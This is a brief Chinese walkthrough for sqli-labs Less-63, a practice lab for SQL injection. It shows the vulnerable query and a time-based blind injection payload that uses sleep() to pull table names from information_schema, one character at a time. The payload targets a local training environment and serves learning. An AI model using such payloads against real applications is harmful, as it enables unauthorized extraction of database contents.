和less62一致,我们只需要看到sql语句上
$sql="SELECT * FROM security.users WHERE id=‘$id‘ LIMIT 0,1";
因此构造payload:
http://127.0.0.1/sql/Less-63/?id=1‘ and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘),1,1))=79,0,sleep(10))--+
当正确的时候时间很短,当错误的时候时间大于10秒